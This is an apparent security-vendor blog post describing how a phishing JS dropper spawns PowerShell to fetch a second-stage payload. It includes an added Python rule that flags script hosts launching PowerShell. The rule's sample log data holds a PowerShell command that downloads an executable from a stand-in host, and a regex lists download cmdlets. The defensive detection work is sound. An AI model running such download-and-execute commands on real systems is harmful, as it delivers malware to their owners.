Preventing Multi-Stage Attacks – Case in Point

By: Danielle Guetta, Product Marketing Manager & Amir Helinger, Product Manager

In our blog post from January of this year we shared how multi-stage attacks work and how our Threat Emulation technology stops them. To illustrate that, we would like to share a real-life multi-stage attack that our Threat Emulation blocked recently.

To recap our first blog post, a multi-stage attack typically includes an initial dropper file, a main payload component of the malware, and additional modules delivered over a period of days, weeks, or more. Just like in the real-life instance we’re about to explain, the initial dropper is typically a benign file that is downloaded from the web or attached to an email, with the sole purpose of downloading another file from the Internet.

Figure 1: Generic multi-stage attack

Threat Emulation analyzes the dropper file's actions using a secured, open connection to the internet: it lets the dropper download the second file, executes that file, and detects it as malicious, thus preventing the attack.

This is exactly how we blocked the real-life multi-stage attack:

The initial dropper file was delivered in a phishing campaign, in the form of a JavaScript (JS) file bundled in a RAR archive. Once opened, the JS runs PowerShell, which downloads the payload component, the malicious part of this multi-stage attack.
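The chain just described (a script host running the JS dropper, which spawns PowerShell to fetch the next stage) also leaves a clear trace in endpoint process-creation telemetry. The following is an added example, not Check Point's code or part of the original post; it runs a simple detection rule over constructed, Sysmon-style log records, and the field names, paths and URL are assumptions:

```python
import re
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # hosts that execute a .js dropper
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Cmdlets/classes commonly used to fetch a second stage; a bare URL also counts.
DOWNLOAD_RE = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer"
    r"|Net\.WebClient|https?://)",
    re.IGNORECASE,
)

# Constructed sample records (Sysmon Event ID 1 style, pipe-separated); not real telemetry.
SAMPLE_LOGS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\wscript.exe"
    "|CommandLine=wscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\Rar$\\invoice.js",
    "ParentImage=C:\\Windows\\System32\\wscript.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -Command (New-Object Net.WebClient).DownloadFile("
    "'http://stage2.example.invalid/p.exe','C:\\Users\\Public\\p.exe')",
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe Get-Process",
    "ParentImage=C:\\Windows\\System32\\cscript.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -File C:\\Scripts\\cleanup.ps1",
]

def parse(line: str) -> Dict[str, str]:
    """Split 'k=v|k=v' into a dict; values may contain '=', so split once per field."""
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(rec: Dict[str, str]) -> str:
    """Return 'high', 'medium' or 'none' for one process-creation record."""
    if basename(rec.get("Image", "")) not in POWERSHELL:
        return "none"
    if basename(rec.get("ParentImage", "")) not in SCRIPT_HOSTS:
        return "none"
    # A script host spawning PowerShell is unusual on its own; a fetch makes it the dropper chain.
    return "high" if DOWNLOAD_RE.search(rec.get("CommandLine", "")) else "medium"

def detect(lines: List[str]) -> List[Dict[str, str]]:
    alerts = []
    for line in lines:
        rec = parse(line)
        sev = classify(rec)
        if sev != "none":
            alerts.append({"severity": sev, "parent": basename(rec["ParentImage"]),
                           "cmd": rec["CommandLine"]})
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_LOGS):
        print(a["severity"], a["parent"], "->", a["cmd"])
```

The rule deliberately fires at "medium" on any script-host-to-PowerShell launch, so benign admin scripts can be tuned out by parent path or command line rather than by weakening the download check.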

Figure 2: The multi-stage attack caught by ThreatCloud

By analyzing the dropper file's actions from the start and letting it download the malicious second-stage dropper file, our Threat Emulation discovered the attack and prevented it before it breached the network.